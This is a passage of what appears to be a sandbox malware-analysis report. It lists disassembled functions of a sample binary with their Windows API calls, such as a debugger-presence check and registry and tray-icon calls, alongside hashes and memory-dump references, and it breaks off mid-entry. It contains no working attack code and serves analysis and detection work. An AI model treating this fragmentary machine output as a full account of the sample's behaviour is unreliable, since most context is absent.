                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                        • String ID: OV*
                                                                                                                                                                        • API String ID: 2583163307-3017613547
                                                                                                                                                                        • Opcode ID: 1a7cb08c32f89cc144b49b3136de97b9a4bbb78a069a5cdf09a768ae8207a61b
                                                                                                                                                                        • Instruction ID: f0c694c2063b68b35eb6320a2ace73d596ead9b72e4b9ad3b57e1efa0494017d
                                                                                                                                                                        • Opcode Fuzzy Hash: 1a7cb08c32f89cc144b49b3136de97b9a4bbb78a069a5cdf09a768ae8207a61b
                                                                                                                                                                        • Instruction Fuzzy Hash: 96014E32B351716BCE256A74BC85B7E67494B83774F2D025AF9148B1D2EF708DA04B90
                                                                                                                                                                        Function 002658CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002658BE,SwapMouseButtons,00000004,?), ref: 002658EF
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002658BE,SwapMouseButtons,00000004,?), ref: 00265910
                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002658BE,SwapMouseButtons,00000004,?), ref: 00265932
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                                        • Opcode ID: 69d2225f85bea8d306464112d4f00c691714841319d45bced8c0b6ac324ba278
                                                                                                                                                                        • Instruction ID: 9a997c5a20a4e4a10bacf184246e295335c0a673cb498ccd5e0d911173f5b7ba
                                                                                                                                                                        • Opcode Fuzzy Hash: 69d2225f85bea8d306464112d4f00c691714841319d45bced8c0b6ac324ba278
                                                                                                                                                                        • Instruction Fuzzy Hash: 21115A75522628FFDB218F64DC84EAE77B9EF00764F104429E801E7210E6319E91D7A0
                                                                                                                                                                        Function 00272B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00273006
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: CALL$bn,
                                                                                                                                                                        • API String ID: 1385522511-1752176152
                                                                                                                                                                        • Opcode ID: a6c73fdb7d68a98daf409c4aae4d69ec07bc9a37a117b0b541cd2e2b7628c3b7
                                                                                                                                                                        • Instruction ID: d6babe585494ff09ba3ca023dd4e66a45f5de9defe47654d74099e5bef6ef154
                                                                                                                                                                        • Opcode Fuzzy Hash: a6c73fdb7d68a98daf409c4aae4d69ec07bc9a37a117b0b541cd2e2b7628c3b7
                                                                                                                                                                        • Instruction Fuzzy Hash: AA229B70628202DFC714DF24C884A2ABBF1BF94354F14895DF49A8B3A1D771E9A5CF52
                                                                                                                                                                        Function 00263A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 002A413B
                                                                                                                                                                          • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
                                                                                                                                                                          • Part of subcall function 00263A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00263A76
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                        • String ID: X$`u2
                                                                                                                                                                        • API String ID: 779396738-861494381
                                                                                                                                                                        • Opcode ID: 91ce18058c09f92b4d79859b64c9c95e8ed946209c6878c9d0811979185542cb
                                                                                                                                                                        • Instruction ID: 00130eb3dcc6a93bebf93ab9937ca1de28288056370400cefaa16ba807d27d5d
                                                                                                                                                                        • Opcode Fuzzy Hash: 91ce18058c09f92b4d79859b64c9c95e8ed946209c6878c9d0811979185542cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D21C371A202589BCB01DF94D845BEE7BFCAF49310F008019E445B7281DFF49A998FA1
                                                                                                                                                                        Function 0028014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002809D8
                                                                                                                                                                          • Part of subcall function 00283614: RaiseException.KERNEL32(?,?,?,002809FA,?,00000000,?,?,?,?,?,?,002809FA,00000000,00329758,00000000), ref: 00283674
                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002809F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                                                        • Opcode ID: 9de8148d8bb6da35e94408b6d0ea6ba02ff88754180eeb42d7494f103eeb9051
                                                                                                                                                                        • Instruction ID: e324083059c6c9fb0b9b8f48969eebc786d749b29dcdefe3eb3a1aec688eba7c
                                                                                                                                                                        • Opcode Fuzzy Hash: 9de8148d8bb6da35e94408b6d0ea6ba02ff88754180eeb42d7494f103eeb9051
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F0A43C92220DB6CB44BAA8EC8699E776C5E01B50B504121F918965D2FB70E63DCB90
                                                                                                                                                                        Function 002E89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002E8D52
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 002E8D59
                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 002E8F3A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 146820519-0
                                                                                                                                                                        • Opcode ID: 8b265ab20d6dd560737bbe7867078c094d4708bda31d3762fb4ccbecc30d161f
                                                                                                                                                                        • Instruction ID: c9b04119f35c5d64630adf3469eee0ac8fb332dcf4fae4e2e9a25b0c21c222bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b265ab20d6dd560737bbe7867078c094d4708bda31d3762fb4ccbecc30d161f
                                                                                                                                                                        • Instruction Fuzzy Hash: 47128A71A183419FC714CF28C484B2ABBE5BF89314F54895EE8898B392DB31ED55CF92
                                                                                                                                                                        Function 0027FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002661A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00266299
                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0027FD36
                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0027FD45
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002BFE33
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                                                        • Opcode ID: 0d05ef8ca0221d1c5d2e2d36752d4056999634574341794f66d25c4114970bd7
                                                                                                                                                                        • Instruction ID: 7d6db3fbe81a09ef035cc7907914b4b85c69013ced0afd4be1e02cbce2be635f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d05ef8ca0221d1c5d2e2d36752d4056999634574341794f66d25c4114970bd7
                                                                                                                                                                        • Instruction Fuzzy Hash: EF31D471914344AFEB728F248C85BE7BBECAB02308F0004AED5DA57242D3745A94CB51
                                                                                                                                                                        Function 0029970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002997BA,FF8BC369,00000000,00000002,00000000), ref: 00299744
                                                                                                                                                                        • GetLastError.KERNEL32(?,002997BA,FF8BC369,00000000,00000002,00000000,?,00295ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00286F41), ref: 0029974E
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00299755
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                        • Opcode ID: e0f2edda4249e352130c0f6b30f5c144f55e881cf82e7e55f1ede319ae19c513
                                                                                                                                                                        • Instruction ID: afc41c9a65730bc5c2c028e59b376a9eb5c609682e94f036fc561047e5734fd9
                                                                                                                                                                        • Opcode Fuzzy Hash: e0f2edda4249e352130c0f6b30f5c144f55e881cf82e7e55f1ede319ae19c513
                                                                                                                                                                        • Instruction Fuzzy Hash: 83012836630115ABCF159FDDEC468AEBB2ADB85330B240359F81197190EA70DDA1DBA0
                                                                                                                                                                        Function 0027FFE0 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseErrorHandleMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3953868439-0
                                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                        • Instruction ID: c73f70254a293bbcdb29b7fecc970ba75d5bc83f5169d32052d40430061d9c9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9431F578A12106DFC758EF58C4D0A69FBA1FB59300B2486A5E409CB692D772EDE5CBC0
                                                                                                                                                                        Function 0026396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00263A3C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                        • Opcode ID: db3a1b16e47d61c7ef88748dbc068792ef7e80ba2bb48ff236fc37553a7b341f
                                                                                                                                                                        • Instruction ID: e145a5317723b45365c6bd6ae5beb4f2ead01d598c7743119ee11a8466ea10db
                                                                                                                                                                        • Opcode Fuzzy Hash: db3a1b16e47d61c7ef88748dbc068792ef7e80ba2bb48ff236fc37553a7b341f
                                                                                                                                                                        • Instruction Fuzzy Hash: 5431A271615701CFD321DF24D884797BBE8FB49318F00092EE5DA87251E7B5AA98CF92
                                                                                                                                                                        Function 0026331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsThemeActive.UXTHEME ref: 0026333D
                                                                                                                                                                          • Part of subcall function 002632E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002632FB
                                                                                                                                                                          • Part of subcall function 002632E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00263312
                                                                                                                                                                          • Part of subcall function 0026338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00263368,?), ref: 002633BB
                                                                                                                                                                          • Part of subcall function 0026338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00263368,?), ref: 002633CE
                                                                                                                                                                          • Part of subcall function 0026338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00332418,00332400,?,?,?,?,?,?,00263368,?), ref: 0026343A
                                                                                                                                                                          • Part of subcall function 0026338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002634BB
                                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00263377
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1550534281-0
                                                                                                                                                                        • Opcode ID: 8439eecf64713ce06310fcde1c9eb5972445cb69a1053f54f6a66f2e0576b66b
                                                                                                                                                                        • Instruction ID: 882c95556d683f3eef3d9822196023351bafbbacc41b317447f627f992bb6ba7
                                                                                                                                                                        • Opcode Fuzzy Hash: 8439eecf64713ce06310fcde1c9eb5972445cb69a1053f54f6a66f2e0576b66b
                                                                                                                                                                        • Instruction Fuzzy Hash: B8F05E755647449FE303AF70FD8BB663798A701729F104819B6098A1E2CBBA85B4CF80
                                                                                                                                                                        Function 0026CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0026CEEE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                        • Opcode ID: ff6ba7e56e0995dbc0f84303d308a83ca36fae80320b3e6bfd92d0d49dd62232
                                                                                                                                                                        • Instruction ID: 973f63a78962985b2d5f9e26faf9fdca30dd056a7e63dbbde8650acc5ad19fab
                                                                                                                                                                        • Opcode Fuzzy Hash: ff6ba7e56e0995dbc0f84303d308a83ca36fae80320b3e6bfd92d0d49dd62232
                                                                                                                                                                        • Instruction Fuzzy Hash: 24320374A20206DFCB20EF54C894ABEB7B9FF45350F64806AE945AB251C774EDA1CB90
                                                                                                                                                                        Function 002E7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                        • Opcode ID: 80623baa9b757b0c51d9b1b8ed8ee80d10a13242ebb0a6a1eaf08ce2b691249d
                                                                                                                                                                        • Instruction ID: 7597fdf8a0800d8ff015ad73465969cb465f2535e0203c6e1936607565e4e321
                                                                                                                                                                        • Opcode Fuzzy Hash: 80623baa9b757b0c51d9b1b8ed8ee80d10a13242ebb0a6a1eaf08ce2b691249d
                                                                                                                                                                        • Instruction Fuzzy Hash: E1D18E34A2424AEFCF14EF95C8819ADBBB5FF08310F54415AE915AB391DB30ADA1CF90
                                                                                                                                                                        Function 0028F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bb1d281c633ea5df2bdeb3f913de2d5345f508acbbe8f146937272fda3871f05
                                                                                                                                                                        • Instruction ID: 303913903d26b5a40327205368559963343da83e5c76015b6bc68ef883149f4b
                                                                                                                                                                        • Opcode Fuzzy Hash: bb1d281c633ea5df2bdeb3f913de2d5345f508acbbe8f146937272fda3871f05
                                                                                                                                                                        • Instruction Fuzzy Hash: 94513839A21104AFDB50EF68C940FA97BA5EF85324F19C168EC089B3D5D771ED62CB90
                                                                                                                                                                        Function 002CFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 002CFCCE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                                                        • String ID:
